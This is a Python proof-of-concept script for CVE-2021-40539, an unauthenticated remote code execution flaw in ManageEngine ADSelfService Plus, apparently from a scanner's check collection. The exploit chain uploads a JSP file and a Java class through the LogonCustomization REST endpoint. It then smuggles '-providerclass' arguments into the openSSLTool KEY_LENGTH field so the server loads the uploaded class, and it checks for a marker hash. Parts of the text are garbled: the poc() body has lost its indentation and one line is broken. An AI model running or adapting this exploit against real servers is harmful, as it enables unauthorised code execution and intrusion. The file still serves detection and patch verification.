CVE-2021-40539.py
import requests
# Vuln Base Info
def info():
    """Return the static vulnerability metadata record for this check.

    The record is a plain dict (author, name, description, severity,
    references, classification, metadata, tags); poc() embeds it in a
    successful result under result["info"].
    """
    classification = {
        "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "cvss-score": "",  # left blank by the author
        "cve-id": "CVE-2021-40539",
        "cwe-id": "CWE-287",
    }
    references = [
        "https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis",
        "https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html",
        "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539",
        "https://github.com/synacktiv/CVE-2021-40539",
    ]
    return {
        "author": "cckuailong",
        "name": "ManageEngine ADSelfService Plus version 6113 Unauthenticated RCE",
        "description": "ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass which leads to remote code execution.",
        "severity": "critical",
        "references": references,
        "classification": classification,
        "metadata": {"vuln-target": ""},
        "tags": ["cve", "cve2021", "rce", "ad", "intrusive", "manageengine"],
    }
# Vendor Fingerprint
def fingerprint(url):
    """Return whether *url* looks like the targeted product.

    This is a stub: the argument is never inspected and every host is
    reported as a match, so callers get no vendor filtering from it.
    """
    always_matches = True
    return always_matches
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/./RestAPI/LogonCustomization"""
method = "POST"
data = """--8b1ab266c41afb773af2e064bc526458
Content-Disposition: form-data; name="methodToCall"
unspecified
--8b1ab266c41afb773af2e064bc526458
Content-Disposition: form-data; name="Save"
yes
--8b1ab266c41afb773af2e064bc526458
Content-Disposition: form-data; name="form"
smartcard
--8b1ab266c41afb773af2e064bc526458
Content-Disposition: form-data; name="operation"
Add
--8b1ab266c41afb773af2e064bc526458
Content-Disposition: form-data; name="CERTIFICATE_PATH"; filename="ws.jsp"
<%@ page import="java.util.*,java.io.*"%>
<%@ page import="java.security.MessageDigest"%>
<%
String cve = "CVE-2021-40539";
MessageDigest alg = MessageDigest.getInstance("MD5");
alg.reset();
alg.update(cve.getBytes());
byte[] digest = alg.digest();
StringBuffer hashedpasswd = new StringBuffer();
String hx;
for (int i=0;i<digest.length;i++){
hx = Integer.toHexString(0xFF & digest[i]);
if(hx.length() == 1){hx = "0" + hx;}
hashedpasswd.append(hx);
}
out.println(hashedpasswd.toString());
%>
--8b1ab266c41afb773af2e064bc526458--"""
headers = {'Content-Type': 'multipart/form-data; boundary=8b1ab266c41afb773af2e064bc526458'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/./RestAPI/LogonCustomization"""
method = "POST"
data = """--43992a07d9a30213782780204a9f032b
Content-Disposition: form-data; name="methodToCall"
unspecified
--43992a07d9a30213782780204a9f032b
Content-Disposition: form-data; name="Save"
yes
--43992a07d9a30213782780204a9f032b
Content-Disposition: form-data; name="form"
smartcard
--43992a07d9a30213782780204a9f032b
Content-Disposition: form-data; name="operation"
Add
--43992a07d9a30213782780204a9f032b
Content-Disposition: form-data; name="CERTIFICATE_PATH"; filename="Si.class"
{{hex_decode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}}
--43992a07d9a30213782780204a9f032b--"""
headers = {'Content-Type': 'multipart/form-data; boundary=43992a07d9a30213782780204a9f032b'}
resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/./RestAPI/Connection"""
method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}}\n--43992a07d9a30213782780204a9f032b--\n',"
data = """methodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22"""
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp2 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/help/admin-guide/test.jsp"""
method = "GET"
data = """"""
headers = {}
resp3 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if ("""114f7ce498a54a1be1de1f1e5731d0ea""" in resp3.text) and (resp3.status_code == 200):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit; may be the same as poc()
def exp(url):
    """Run the exploit step for *url*.

    Plain delegation: the result dict is exactly what poc(url) returns.
    """
    result = poc(url)
    return result
# Utils
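def format_url(url):
    """Normalize an operator-supplied base URL for request building.

    Strips surrounding whitespace, prefixes ``http://`` when no
    ``http://``/``https://`` scheme is present, and drops trailing
    slashes so a path can be appended directly.

    Args:
        url: Host or URL string as typed by the operator.

    Returns:
        The normalized URL string, always starting with a scheme.
    """
    url = url.strip()
    # The scheme is case-insensitive (RFC 3986): "HTTP://host" must not be
    # prefixed a second time. Only the comparison is lowered; the original
    # text is returned unchanged.
    if not url.lower().startswith(("http://", "https://")):
        url = "http://" + url
    return url.rstrip("/")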